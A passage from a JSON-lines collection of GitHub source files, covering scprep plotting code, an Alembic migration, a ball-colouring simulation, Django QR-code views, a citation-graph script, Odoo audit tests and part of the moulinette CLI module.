Instead\n create plots by running `scprep.stats.knnDREMI` with `plot=True`.\n\n Parameters\n ----------\n figsize : tuple, optional (default: (12, 3.5))\n Matplotlib figure size\n filename : str or `None`, optional (default: None)\n If given, saves the results to a file\n xlabel : str, optional (default: \"Feature 1\")\n The name of the gene shown on the x axis\n ylabel : str, optional (default: \"Feature 2\")\n The name of the gene shown on the y axis\n title_fontsize : int, optional (default: 18)\n Font size for figure titles\n label_fontsize : int, optional (default: 16)\n Font size for axis labels\n dpi : int, optional (default: 150)\n Dots per inch for saved figure\n \"\"\"\n fig, axes = plt.subplots(1, 4, figsize=figsize)\n # Plot raw data\n axes[0].scatter(x, y, c=\"k\", s=4)\n axes[0].set_title(\"Input\\ndata\", fontsize=title_fontsize)\n axes[0].set_xticks([])\n axes[0].set_yticks([])\n axes[0].set_xlabel(xlabel, fontsize=label_fontsize)\n axes[0].set_ylabel(ylabel, fontsize=label_fontsize)\n\n # Plot kNN density\n n = ((n_mesh + 1) * n_bins) + 1\n axes[1].imshow(np.log(density.reshape(n, n)),\n cmap='inferno', origin=\"lower\", aspect=\"auto\")\n for b in np.linspace(0, n, n_bins + 1):\n axes[1].axhline(b - 0.5, c=\"grey\", linewidth=1)\n\n for b in np.linspace(0, n, n_bins + 1):\n axes[1].axvline(b - 0.5, c=\"grey\", linewidth=1)\n\n axes[1].set_xticks([])\n axes[1].set_yticks([])\n axes[1].set_title(\"kNN\\nDensity\", fontsize=title_fontsize)\n axes[1].set_xlabel(xlabel, fontsize=label_fontsize)\n\n # Plot joint probability\n axes[2].imshow(bin_density,\n cmap=\"inferno\", origin=\"lower\", aspect=\"auto\")\n axes[2].set_xticks([])\n axes[2].set_yticks([])\n axes[2].set_title(\"Joint Prob.\\nMI={:.2f}\".format(mutual_info),\n fontsize=title_fontsize)\n axes[2].set_xlabel(xlabel, fontsize=label_fontsize)\n\n # Plot conditional probability\n axes[3].imshow(drevi,\n cmap=\"inferno\", origin=\"lower\", aspect=\"auto\")\n axes[3].set_xticks([])\n axes[3].set_yticks([])\n axes[3].set_title(\"Conditional Prob.\\nDREMI={:.2f}\".format(dremi),\n fontsize=title_fontsize)\n axes[3].set_xlabel(xlabel, fontsize=label_fontsize)\n\n fig.tight_layout()\n if filename is not None:\n fig.savefig(filename, dpi=dpi)\n plot.utils.show(fig)\n\n\ndef _vector_coerce_dense(x):\n x = utils.toarray(x)\n x_1d = x.flatten()\n if not len(x_1d) == x.shape[0]:\n raise ValueError(\n \"x must be a 1D array. Got shape {}\".format(x.shape))\n return x_1d\n\n\ndef _vector_coerce_two_dense(x, y):\n try:\n x = _vector_coerce_dense(x)\n y = _vector_coerce_dense(y)\n except ValueError as e:\n if \"x must be a 1D array. Got shape \" in str(e):\n raise ValueError(\"Expected x and y to be 1D arrays. \"\n \"Got shapes x {}, y {}\".format(x.shape, y.shape))\n else:\n raise\n return x, y\n","repo_name":"mwufi/scprep","sub_path":"scprep/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":14447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"3570860975","text":"\"\"\"update models\n\nRevision ID: 0e38459fb5d2\nRevises: \nCreate Date: 2021-07-16 11:43:11.836686\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '0e38459fb5d2'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('courses',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('course_id', sa.Text(), nullable=False),\n sa.Column('course_name', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('course_id')\n )\n op.create_table('interests',\n sa.Column('interest_id', sa.Integer(), nullable=False),\n sa.Column('interest_name', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('interest_id'),\n sa.UniqueConstraint('interest_name')\n )\n op.create_table('networking_goals',\n sa.Column('networking_goal_id', sa.Integer(), nullable=False),\n sa.Column('networking_goal', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('networking_goal_id'),\n sa.UniqueConstraint('networking_goal')\n )\n op.create_table('time_options',\n sa.Column('time_id', sa.Integer(), nullable=False),\n sa.Column('time_option', sa.Text(), nullable=False),\n sa.PrimaryKeyConstraint('time_id'),\n sa.UniqueConstraint('time_option')\n )\n op.create_table('students',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('email', sa.String(length=64), nullable=False),\n sa.Column('username', sa.String(length=64), nullable=True),\n sa.Column('student_id', sa.Integer(), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('firstname', sa.Text(), nullable=True),\n sa.Column('lastname', sa.Text(), nullable=True),\n sa.Column('city', sa.Text(), nullable=True),\n sa.Column('state', sa.Text(), nullable=True),\n sa.Column('country', sa.Text(), nullable=True),\n sa.Column('bio', sa.Text(), nullable=True),\n sa.Column('cohort', sa.Text(), nullable=True),\n sa.Column('linkedin', sa.Text(), nullable=True),\n sa.Column('course_id_to_match', sa.Integer(), nullable=True),\n sa.Column('interest_id_to_match', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['course_id_to_match'], ['courses.id'], ),\n sa.ForeignKeyConstraint(['interest_id_to_match'], ['interests.interest_id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('student_id')\n )\n op.create_index(op.f('ix_students_email'), 'students', ['email'], unique=True)\n op.create_index(op.f('ix_students_username'), 'students', ['username'], unique=True)\n op.create_table('current_courses_record',\n sa.Column('student_id', sa.Integer(), nullable=False),\n sa.Column('course_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['course_id'], ['courses.id'], ),\n sa.ForeignKeyConstraint(['student_id'], ['students.id'], ),\n sa.PrimaryKeyConstraint('student_id', 'course_id')\n )\n op.create_table('past_courses_record',\n sa.Column('student_id', sa.Integer(), nullable=False),\n sa.Column('course_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['course_id'], ['courses.id'], ),\n sa.ForeignKeyConstraint(['student_id'], ['students.id'], ),\n sa.PrimaryKeyConstraint('student_id', 'course_id')\n )\n op.create_table('student_interest_record',\n sa.Column('student_id', sa.Integer(), nullable=False),\n sa.Column('interest_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['interest_id'], ['interests.interest_id'], ),\n sa.ForeignKeyConstraint(['student_id'], ['students.id'], ),\n sa.PrimaryKeyConstraint('student_id', 'interest_id')\n )\n op.create_table('weekly_signups',\n sa.Column('weekly_signup_id', sa.Integer(), nullable=False),\n sa.Column('week_meet', sa.Text(), nullable=True),\n sa.Column('student_id', sa.Integer(), nullable=False),\n sa.Column('prime_time_id', sa.Integer(), nullable=False),\n sa.Column('sec_time_id', sa.Integer(), 
nullable=False),\n sa.Column('prime_networking_goal_id', sa.Integer(), nullable=False),\n sa.Column('sec_networking_goal_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['prime_networking_goal_id'], ['networking_goals.networking_goal_id'], ),\n sa.ForeignKeyConstraint(['prime_time_id'], ['time_options.time_id'], ),\n sa.ForeignKeyConstraint(['sec_networking_goal_id'], ['networking_goals.networking_goal_id'], ),\n sa.ForeignKeyConstraint(['sec_time_id'], ['time_options.time_id'], ),\n sa.ForeignKeyConstraint(['student_id'], ['students.id'], ),\n sa.PrimaryKeyConstraint('weekly_signup_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('weekly_signups')\n op.drop_table('student_interest_record')\n op.drop_table('past_courses_record')\n op.drop_table('current_courses_record')\n op.drop_index(op.f('ix_students_username'), table_name='students')\n op.drop_index(op.f('ix_students_email'), table_name='students')\n op.drop_table('students')\n op.drop_table('time_options')\n op.drop_table('networking_goals')\n op.drop_table('interests')\n op.drop_table('courses')\n # ### end Alembic commands ###\n","repo_name":"jli293/PennChats","sub_path":"migrations/versions/0e38459fb5d2_update_models.py","file_name":"0e38459fb5d2_update_models.py","file_ext":"py","file_size_in_byte":5301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"4959877442","text":"import random\n\ndef outerLoop(trials):\n total = 0\n for i in range(trials):\n total += ballRun()\n avg = total/trials\n print(\"The average number per trial was \",avg)\n\ndef ballRun():\n balls = ['b','g','r','y']\n index = [0,1,2,3]\n ballsSame = False\n counter = 0\n while not ballsSame:\n counter += 1\n copyindex = index[:]\n firstChoice =random.choice(copyindex)\n copyindex.remove(firstChoice)\n secondChoice = random.choice(copyindex)\n balls[secondChoice] = balls[firstChoice]\n if(all(x==balls[0] for x in balls)):\n ballsSame = True\n return counter\n\n\nouterLoop(10000)\n","repo_name":"ebbitten/ScratchEtc","sub_path":"538/ballColoring.py","file_name":"ballColoring.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"24126557927","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponseNotFound\nfrom django.contrib.auth import authenticate\nfrom django.forms.models import model_to_dict\nfrom django.core.files.base import File\nfrom .models import Profile, QrCode\nimport qrcode\nfrom .forms import QrForm\nfrom io import BytesIO\nimport random\n\n\n# Create your views here.\n\ndef dashboard(request):\n return render(request, \"views/dashboard.html\")\n\ndef view_qrs(request):\n if not request.user.is_authenticated: return redirect('/')\n profile = model_to_dict(request.user.profile)\n data = {\n 'profile':profile,\n }\n return render(request, \"views/list.html\", data)\n\ndef create(request):\n if not request.user.is_authenticated: return redirect('/')\n if request.method == \"POST\":\n form = QrForm(request.POST)#, request.FILES)\n if form.is_valid():\n model = form.save(commit=False)\n model.user = request.user\n\n\n model.save()\n\n\n blob = BytesIO()\n img = qrcode.make(f'http://{request.get_host()}/qr/redirect/{model.id}')\n img.save(blob, format='PNG')\n model.image.save(f'{random.randint(0, 99999)}.png', File(blob))\n\n \n 
user_prof = Profile.objects.get(user=request.user)\n user_prof.codes.add(model)\n user_prof.save()\n return redirect(f'/qr/edit/{model.id}')\n form = QrForm()\n data = {\n 'form':form,\n }\n return render(request, \"views/create.html\", data)\n\ndef qr_redirect(request, pk):\n obj = get_object_or_404(QrCode, id=pk)\n return redirect(obj.url)\n\ndef edit_qr(request, pk):\n if not request.user.is_authenticated: return redirect('/')\n obj = get_object_or_404(QrCode, id=pk)\n\n\n if request.method == 'POST':\n if request.POST.get('delete'):\n if obj.user != request.user: return HttpResponseNotFound()\n obj.delete()\n return redirect('/view/')\n else:\n form = QrForm(request.POST, instance=obj)\n if form.is_valid():\n form.save()\n return redirect(request.path)\n\n\n\n if obj.user != request.user: return HttpResponseNotFound()\n\n form = QrForm()\n data = {\n 'obj': obj,\n 'form':QrForm,\n }\n\n return render(request, \"views/edit.html\", data)","repo_name":"ggvick/qr","sub_path":"pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"20419008780","text":"import pandas as pd\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport random\n\ndef sort_dict(data_papers,column_i):\n # this function will sort the papers by years\n #x[1] refers to value of x, while x[0] is the key.\n data_papers_sorted_list=sorted(data_papers.items(), key=lambda x: x[1][column_i])\n\n # convert the list back into the dictionary\n data_papers_sorted={}\n for paper in data_papers_sorted_list:\n data_papers_sorted[paper[0]]=paper[1]\n\n return data_papers_sorted\n\n##### Section: remove non selected children; create data frame #####\n\n# sort papers by years; 1 means the \"2nd column\" of one_paper_data\ndata_all_papers=sort_dict(data_all_papers,1)\n\nbibCode_all_papers=list(data_all_papers.keys())\n\nfrom_all_papers=[]\nto_all_papers=[]\nfor bibCode_one_paper, data_one_paper in data_all_papers.items():\n list_children=data_one_paper[-1]\n list_children_remained=[x for x in list_children if x in bibCode_all_papers]\n data_one_paper[-1]=list_children_remained\n data_all_papers[bibCode_one_paper]=data_one_paper\n\n # create data frame\n num_child=len(list_children_remained)\n\n vrt_name_children_remained=[]\n for bibCode_child_i in list_children_remained:\n vrt_name_multi_lines=data_all_papers[bibCode_child_i][-2]\n vrt_name_children_remained.append(vrt_name_multi_lines)\n\n vrt_name_one_paper=data_all_papers[bibCode_one_paper][-2]\n\n from_one_paper=vrt_name_children_remained # the older paper\n to_one_paper=[vrt_name_one_paper]*num_child # the newer paper\n\n # concatenate the lists\n from_all_papers=from_all_papers+from_one_paper\n to_all_papers=to_all_papers+to_one_paper\n\n##### Section: Draw Graph #####\n\n# Build a dataframe with 4 connections\ndf = pd.DataFrame({ 'from':from_all_papers, 'to':to_all_papers})\n\n# Build your graph\nG=nx.from_pandas_edgelist(df, 'from', 'to', create_using=nx.DiGraph())\n\n# determine vertices' coordinate\nif not nx.is_directed_acyclic_graph(G):\n raise TypeError('Cannot to a graph that is not a DAG')\n\nvertices_sorted=list(nx.topological_sort(G))\n\nnum_vertices=len(vertices_sorted)\n\nposi={}\nfor i in range(num_vertices):\n vrt_name=vertices_sorted[i]\n posi_vert=-i/num_vertices\n posi_hori=random.random()\n posi[vrt_name]=np.array([posi_hori,posi_vert])\n\n# make the vertices less dense\nposi_new = 
vertices_less_dense(posi)\n\n# logic similar to the EM algorithm to get a \"good graph\"\nfor i in range(round(num_vertices*1.4)):\n posi_new = vertices_less_dense(posi_new)\n\n# if the graph doesn't look good, change figsize and rerun the last 3 lines\nplt.figure(1,figsize=(18,18))\nnx.draw(G,pos=posi_new,with_labels=True, node_size=150, arrows=True)\nplt.show()\n","repo_name":"BayiLi081/slr-r","sub_path":"citation_graph/Citation_Tree.py","file_name":"Citation_Tree.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29064111952","text":"# -*- coding: utf-8 -*-\n# (C) 2021 Smile ()\n# License LGPL-3.0 or later (https://www.gnu.org/licenses/lgpl).\n\nfrom odoo.tests.common import TransactionCase\n\n\nclass TestAudit(TransactionCase):\n\n def setUp(self):\n super(TestAudit, self).setUp()\n rule_vals = {\n 'name': 'Audit rule on partners',\n 'model_id': self.env.ref('base.model_res_partner').id,\n 'log_create': True\n }\n self.env['audit.rule'].create(rule_vals)\n partner_vals = {\n 'name': 'Partner',\n 'is_company': False,\n 'email': 'LasLabs@ExAmPlE.CoM',\n }\n self.partner = self.env['res.partner'].create(partner_vals)\n\n def test_log_created_on_create(self):\n \"\"\" A log should be created on creating a partner\"\"\"\n log = self.env['audit.log'].search([\n ('model_id', '=', self.env.ref('base.model_res_partner').id),\n ('method', '=', 'create'),\n ('res_id', '=', self.partner.id),\n ], limit=1)\n self.assertEqual(\n log.name, 'Partner', 'No audit log after partner creation')\n\n def test_log_created_on_write(self):\n \"\"\" A log should be created on updating a partner\"\"\"\n self.partner.write({'name': 'Updated Partner'})\n log = self.env['audit.log'].search([\n ('model_id', '=', self.env.ref('base.model_res_partner').id),\n ('method', '=', 'write'),\n ('res_id', '=', self.partner.id),\n ])\n self.assertEqual(\n log.res_id, self.partner.id, 'No audit log after partner updating')\n\n def test_log_created_on_unlink(self):\n \"\"\" A log should be created on deleting a partner\"\"\"\n self.partner.unlink()\n log = self.env['audit.log'].search([\n ('model_id', '=', self.env.ref('base.model_res_partner').id),\n ('method', '=', 'unlink'),\n ('res_id', '=', self.partner.id),\n ])\n self.assertEqual(\n log.name, 'Partner', 'No audit log after partner unlink')\n","repo_name":"Smile-SA/odoo_addons","sub_path":"smile_audit/tests/test_audit.py","file_name":"test_audit.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"63"} +{"seq_id":"9879497397","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport locale\nimport logging\nimport argparse\nimport tempfile\nfrom collections import OrderedDict\nfrom datetime import date, datetime\nfrom subprocess import call\n\nfrom moulinette import m18n, Moulinette\nfrom moulinette.actionsmap import ActionsMap\nfrom moulinette.core import MoulinetteError, MoulinetteValidationError\nfrom moulinette.interfaces import (\n BaseActionsMapParser,\n ExtendedArgumentParser,\n JSONExtendedEncoder,\n)\nfrom moulinette.utils import log\n\n# Monkeypatch _get_action_name function because there is an annoying bug\n# Explained here: https://bugs.python.org/issue29298\n# Fixed by: https://github.com/python/cpython/pull/3680\n# To reproduce the bug, just launch a command line without action\n# For example:\n# yunohost firewall\n# It should display:\n# usage: yunohost firewall 
{list,reload,allow,disallow,upnp,stop} ... [-h]\n# yunohost firewall: error: the following arguments are required: {list,reload,allow,disallow,upnp,stop}\n# But it display instead:\n# Error: unable to parse arguments 'firewall' because: sequence item 0: expected str instance, NoneType found\n\n\ndef monkey_get_action_name(argument):\n if argument is None:\n return None\n elif argument.option_strings:\n return \"/\".join(argument.option_strings)\n elif argument.metavar not in (None, argparse.SUPPRESS):\n return argument.metavar\n elif argument.dest not in (None, argparse.SUPPRESS):\n return argument.dest\n elif argument.choices:\n return \"{\" + \",\".join(argument.choices) + \"}\"\n else:\n return None\n\n\nargparse._get_action_name = monkey_get_action_name\n\nlogger = log.getLogger(\"moulinette.cli\")\n\n\n# CLI helpers ----------------------------------------------------------\n\nCLI_COLOR_TEMPLATE = \"\\033[{:d}m\\033[1m\"\nEND_CLI_COLOR = \"\\033[m\"\n\ncolors_codes = {\n \"red\": CLI_COLOR_TEMPLATE.format(31),\n \"green\": CLI_COLOR_TEMPLATE.format(32),\n \"yellow\": CLI_COLOR_TEMPLATE.format(33),\n \"blue\": CLI_COLOR_TEMPLATE.format(34),\n \"purple\": CLI_COLOR_TEMPLATE.format(35),\n \"cyan\": CLI_COLOR_TEMPLATE.format(36),\n \"white\": CLI_COLOR_TEMPLATE.format(37),\n}\n\n\ndef colorize(astr, color):\n \"\"\"Colorize a string\n\n Return a colorized string for printing in shell with style ;)\n\n Keyword arguments:\n - astr -- String to colorize\n - color -- Name of the color\n\n \"\"\"\n if os.isatty(1):\n return \"{:s}{:s}{:s}\".format(colors_codes[color], astr, END_CLI_COLOR)\n else:\n return astr\n\n\ndef plain_print_dict(d, depth=0):\n \"\"\"Print in a plain way a dictionary recursively\n\n Print a dictionary recursively for scripting usage to the standard output.\n\n Output formatting:\n >>> d = {'key': 'value', 'list': [1,2], 'dict': {'key2': 'value2'}}\n >>> plain_print_dict(d)\n #key\n value\n #list\n 1\n 2\n #dict\n ##key2\n value2\n\n Keyword arguments:\n - d -- The dictionary to print\n - depth -- The recursive depth of the dictionary\n\n \"\"\"\n # skip first key printing\n if depth == 0 and (isinstance(d, dict) and len(d) == 1):\n _, d = d.popitem()\n if isinstance(d, (tuple, set)):\n d = list(d)\n if isinstance(d, list):\n for v in d:\n plain_print_dict(v, depth + 1)\n elif isinstance(d, dict):\n for k, v in d.items():\n print(\"{}{}\".format(\"#\" * (depth + 1), k))\n plain_print_dict(v, depth + 1)\n else:\n print(d)\n\n\ndef pretty_date(_date):\n \"\"\"Display a date in the current time zone without ms and tzinfo\n\n Argument:\n - date -- The date or datetime to display\n \"\"\"\n import pytz # Lazy loading, this takes like 3+ sec on a RPi2 ?!\n\n # Deduce system timezone\n nowutc = datetime.now(tz=pytz.utc)\n nowtz = datetime.now()\n nowtz = nowtz.replace(tzinfo=pytz.utc)\n offsetHour = nowutc - nowtz\n offsetHour = int(round(offsetHour.total_seconds() / 3600))\n localtz = \"Etc/GMT%+d\" % offsetHour\n\n # Transform naive date into UTC date\n if _date.tzinfo is None:\n _date = _date.replace(tzinfo=pytz.utc)\n\n # Convert UTC date into system locale date\n _date = _date.astimezone(pytz.timezone(localtz))\n if isinstance(_date, datetime):\n return _date.strftime(\"%Y-%m-%d %H:%M:%S\")\n else:\n return _date.strftime(\"%Y-%m-%d\")\n\n\ndef pretty_print_dict(d, depth=0):\n \"\"\"Print in a pretty way a dictionary recursively\n\n Print a dictionary recursively with colors to the standard output.\n\n Keyword arguments:\n - d -- The dictionary to print\n - depth -- The 
recursive depth of the dictionary\n\n \"\"\"\n keys = d.keys()\n if not isinstance(d, OrderedDict):\n keys = sorted(keys)\n for k in keys:\n v = d[k]\n k = colorize(str(k), \"purple\")\n if isinstance(v, (tuple, set)):\n v = list(v)\n if isinstance(v, list) and len(v) == 1:\n v = v[0]\n if isinstance(v, dict):\n print(\"{:s}{}: \".format(\" \" * depth, k))\n pretty_print_dict(v, depth + 1)\n elif isinstance(v, list):\n print(\"{:s}{}: \".format(\" \" * depth, k))\n for key, value in enumerate(v):\n if isinstance(value, tuple):\n pretty_print_dict({value[0]: value[1]}, depth + 1)\n elif isinstance(value, dict):\n pretty_print_dict({key: value}, depth + 1)\n else:\n if isinstance(v, date):\n v = pretty_date(v)\n print(\"{:s}- {}\".format(\" \" * (depth + 1), value))\n else:\n if isinstance(v, date):\n v = pretty_date(v)\n print(\"{:s}{}: {}\".format(\" \" * depth, k, v))\n\n\ndef get_locale():\n \"\"\"Return current user locale\"\"\"\n try:\n lang = locale.getdefaultlocale()[0]\n except Exception:\n # In some edge case the locale lib fails ...\n # c.f. https://forum.yunohost.org/t/error-when-trying-to-enter-user-information-in-admin-panel/11390/11\n lang = os.getenv(\"LANG\")\n if not lang:\n return \"\"\n return lang[:2]\n\n\n# CLI Classes Implementation -------------------------------------------\n\n\nclass TTYHandler(logging.StreamHandler):\n\n \"\"\"TTY log handler\n\n A handler class which prints logging records for a tty. The record is\n nevertheless formatted depending on whether it is connected to a tty(-like)\n device.\n If that is the case, the level name - optionally colorized - is prepended\n to the message and the result is stored in the record as `message_key`\n attribute. That way, a custom formatter can be defined. The default is\n to output just the formatted message.\n Anyway, if the stream is not a tty, just the message is output.\n\n Note that records with a level higher than or equal to WARNING are sent to\n stderr. 
Otherwise, they are sent to stdout.\n\n \"\"\"\n\n LEVELS_COLOR = {\n log.NOTSET: \"white\",\n log.DEBUG: \"white\",\n log.INFO: \"cyan\",\n log.SUCCESS: \"green\",\n log.WARNING: \"yellow\",\n log.ERROR: \"red\",\n log.CRITICAL: \"red\",\n }\n\n def __init__(self, message_key=\"fmessage\"):\n logging.StreamHandler.__init__(self)\n self.message_key = message_key\n\n def format(self, record):\n \"\"\"Enhance message with level and colors if supported.\"\"\"\n msg = record.getMessage()\n if self.supports_color():\n level = \"\"\n if self.level <= log.DEBUG:\n # add level name before message\n level = \"%s \" % record.levelname\n elif record.levelname in [\"SUCCESS\", \"WARNING\", \"ERROR\", \"INFO\"]:\n # add translated level name before message\n level = \"%s \" % m18n.g(record.levelname.lower())\n color = self.LEVELS_COLOR.get(record.levelno, \"white\")\n msg = \"{}{}{}{}\".format(colors_codes[color], level, END_CLI_COLOR, msg)\n if self.formatter:\n # use user-defined formatter\n record.__dict__[self.message_key] = msg\n return self.formatter.format(record)\n return msg\n\n def emit(self, record):\n # set proper stream first\n if record.levelno >= log.WARNING:\n self.stream = sys.stderr\n else:\n self.stream = sys.stdout\n logging.StreamHandler.emit(self, record)\n\n def supports_color(self):\n \"\"\"Check whether current stream supports color.\"\"\"\n if hasattr(self.stream, \"isatty\") and self.stream.isatty():\n return True\n return False\n\n\nclass ActionsMapParser(BaseActionsMapParser):\n\n \"\"\"Actions map's Parser for the CLI\n\n Provide actions map parsing methods for CLI usage. The parser for\n the arguments is represented by an ExtendedArgumentParser object.\n\n Keyword arguments:\n - parser -- The ExtendedArgumentParser object to use\n - subparser_kwargs -- Arguments to pass to the sub-parser group\n - top_parser -- An ArgumentParser object whose arguments should\n be taken into account but not parsed\n\n \"\"\"\n\n def __init__(\n self, parent=None, parser=None, subparser_kwargs=None, top_parser=None\n ):\n super(ActionsMapParser, self).__init__(parent)\n\n if subparser_kwargs is None:\n subparser_kwargs = {\"title\": \"categories\", \"required\": False}\n self._parser = parser or ExtendedArgumentParser()\n self._subparsers = self._parser.add_subparsers(**subparser_kwargs)\n self.global_parser = parent.global_parser if parent else None\n\n if top_parser:\n self.global_parser = self._parser.add_argument_group(\"global arguments\")\n\n # Append each top parser action to the global group\n for action in top_parser._actions:\n action.dest = argparse.SUPPRESS\n self.global_parser._add_action(action)\n\n # Implement virtual properties\n\n interface = \"cli\"\n\n # Implement virtual methods\n\n @staticmethod\n def format_arg_names(name, full):\n if name.startswith(\"-\") and full:\n return [name, full]\n return [name]\n\n def has_global_parser(self):\n return True\n\n def add_category_parser(self, name, category_help=None, **kwargs):\n \"\"\"Add a parser for a category\n\n Keyword arguments:\n - category_help -- A brief description for the category\n\n Returns:\n A new ActionsMapParser object for the category\n\n \"\"\"\n parser = self._subparsers.add_parser(\n name, description=category_help, help=category_help, **kwargs\n )\n return self.__class__(\n parent=self,\n parser=parser,\n subparser_kwargs={\"title\": \"subcommands\", \"required\": True},\n )\n\n def add_subcategory_parser(self, name, subcategory_help=None, **kwargs):\n \"\"\"Add a parser for a subcategory\n\n Keyword 
arguments:\n - subcategory_help -- A brief description for the category\n\n Returns:\n A new ActionsMapParser object for the category\n\n \"\"\"\n parser = self._subparsers.add_parser(\n name,\n type_=\"subcategory\",\n description=subcategory_help,\n help=subcategory_help,\n **kwargs,\n )\n return self.__class__(\n parent=self,\n parser=parser,\n subparser_kwargs={\"title\": \"actions\", \"required\": True},\n )\n\n def add_action_parser(\n self,\n name,\n tid,\n action_help=None,\n deprecated=False,\n deprecated_alias=[],\n hide_in_help=False,\n **kwargs,\n ):\n \"\"\"Add a parser for an action\n\n Keyword arguments:\n - action_help -- A brief description for the action\n - deprecated -- Whether the action is deprecated\n - deprecated_alias -- A list of deprecated action alias names\n\n Returns:\n A new ExtendedArgumentParser object for the action\n\n \"\"\"\n return self._subparsers.add_parser(\n name,\n type_=\"action\",\n help=action_help,\n description=action_help,\n deprecated=deprecated,\n deprecated_alias=deprecated_alias,\n hide_in_help=hide_in_help,\n )\n\n def auth_method(self, args):\n ret = self.parse_args(args)\n tid = getattr(ret, \"_tid\", [])\n\n # We go down in the subparser tree until we find the leaf\n # corresponding to the tid with a defined authentication\n # (yeah it's a mess because the datastructure is a mess..)\n _p = self._subparsers\n for word in tid[1:]:\n _p = _p.choices[word]\n if hasattr(_p, \"authentication\"):\n return _p.authentication\n else:\n _p = _p._actions[1]\n\n if tid == []:\n return None\n\n raise MoulinetteError(f\"Authentication undefined for {tid} ?\", raw_msg=True)\n\n def parse_args(self, args, **kwargs):\n try:\n return self._parser.parse_args(args)\n except SystemExit:\n raise\n except Exception as e:\n error_message = \"unable to parse arguments '{}' because: {}\".format(\n \" \".join(args),\n e,\n )\n logger.exception(error_message)\n raise MoulinetteValidationError(error_message, raw_msg=True)\n\n def want_to_take_lock(self, args):\n ret = self.parse_args(args)\n tid = getattr(ret, \"_tid\", [])\n if len(tid) == 3:\n _p = self._subparsers.choices[tid[1]]._actions[1].choices[tid[2]]\n elif len(tid) == 4:\n _p = (\n self._subparsers.choices[tid[1]]\n ._actions[1]\n .choices[tid[2]]\n ._actions[1]\n .choices[tid[3]]\n )\n\n return getattr(_p, \"want_to_take_lock\", True)\n\n\nclass Interface:\n\n \"\"\"Command-line Interface for the moulinette\n\n Initialize an interface connected to the standard input/output\n stream and to a given actions map.\n\n Keyword arguments:\n - actionsmap -- The ActionsMap instance to connect to\n\n \"\"\"\n\n type = \"cli\"\n\n def __init__(\n self,\n top_parser=None,\n load_only_category=None,\n actionsmap=None,\n locales_dir=None,\n ):\n # Set user locale\n m18n.set_locale(get_locale())\n\n self.actionsmap = ActionsMap(\n actionsmap,\n ActionsMapParser(top_parser=top_parser),\n load_only_category=load_only_category,\n )\n\n Moulinette._interface = self\n\n def run(self, args, output_as=None, timeout=None):\n \"\"\"Run the moulinette\n\n Process the action corresponding to the given arguments 'args'\n and print the result.\n\n Keyword arguments:\n - args -- A list of argument strings\n - output_as -- Output result in another format. 
Possible values:\n - json: return a JSON encoded string\n - plain: return a script-readable output\n - none: do not output the result\n - timeout -- Number of seconds before this command will time out because it can't acquire the lock (meaning that another command is currently running), by default there is no timeout and the command will wait until it can get the lock\n\n \"\"\"\n\n if output_as and output_as not in [\"json\", \"plain\", \"none\"]:\n raise MoulinetteValidationError(\"invalid_usage\")\n\n if not args:\n raise MoulinetteValidationError(\"invalid_usage\")\n\n try:\n ret = self.actionsmap.process(args, timeout=timeout)\n except (KeyboardInterrupt, EOFError):\n raise MoulinetteError(\"operation_interrupted\")\n\n if ret is None or output_as == \"none\":\n return\n\n # Format and print result\n if output_as:\n if output_as == \"json\":\n import json\n\n print(json.dumps(ret, cls=JSONExtendedEncoder))\n else:\n plain_print_dict(ret)\n elif isinstance(ret, dict):\n pretty_print_dict(ret)\n else:\n print(ret)\n\n def authenticate(self, authenticator):\n # Hmpf we have no use-case in yunohost anymore where we need to auth\n # because everything is run as root ...\n # I guess we could imagine some yunohost-independent use-case where\n # moulinette is used to create a CLI for a non-root user that needs to\n # auth somehow but hmpf -.-\n msg = m18n.g(\"password\")\n credentials = self.prompt(msg, True, False, color=\"yellow\")\n return authenticator.authenticate_credentials(credentials=credentials)\n\n def prompt(\n self,\n message,\n is_password=False,\n confirm=False,\n color=\"blue\",\n prefill=\"\",\n is_multiline=False,\n autocomplete=[],\n help=None,\n ):\n \"\"\"Prompt for a value\n\n Keyword arguments:\n - color -- The color to use for prompting message\n \"\"\"\n\n if not os.isatty(1):\n raise MoulinetteError(\n \"Not a tty, can't do interactive prompts\", raw_msg=True\n )\n\n def _prompt(message):\n if not is_multiline:\n import prompt_toolkit\n from prompt_toolkit.completion import WordCompleter\n from prompt_toolkit.styles import Style\n\n autocomplete_ = WordCompleter(autocomplete)\n style = Style.from_dict(\n {\n \"\": \"\",\n \"message\": f\"#ansi{color} bold\",\n 